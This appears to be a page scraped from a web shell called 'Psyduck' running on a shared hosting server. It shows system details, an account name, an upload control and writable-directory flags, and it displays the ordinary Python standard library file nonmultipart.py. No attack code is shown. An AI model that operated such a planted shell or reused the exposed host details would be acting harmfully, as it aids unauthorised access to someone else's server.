Psyduck - 可達鴨 之 鴨力山大2


Server : LiteSpeed
System : Linux premium217.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : alloknri ( 880)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /opt/alt/python311/lib64/python3.11/email/mime/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/alt/python311/lib64/python3.11/email/mime/nonmultipart.py
# Copyright (C) 2002-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Base class for MIME type messages that are not multipart."""

__all__ = ['MIMENonMultipart']

from email import errors
from email.mime.base import MIMEBase


class MIMENonMultipart(MIMEBase):
    """Base class for MIME non-multipart type messages."""

    def attach(self, payload):
        # The public API prohibits attaching multiple subparts to MIMEBase
        # derived subtypes since none of them are, by definition, of content
        # type multipart/*
        raise errors.MultipartConversionError(
            'Cannot attach additional subparts to non-multipart/*')
Name
Size
Permissions
Options
__pycache__
--
drwxr-xr-x
__init__.py
0 KB
-rw-r--r--
application.py
1.29 KB
-rw-r--r--
audio.py
3.021 KB
-rw-r--r--
base.py
0.893 KB
-rw-r--r--
image.py
3.639 KB
-rw-r--r--
message.py
1.284 KB
-rw-r--r--
multipart.py
1.581 KB
-rw-r--r--
nonmultipart.py
0.673 KB
-rw-r--r--
text.py
1.401 KB
-rw-r--r--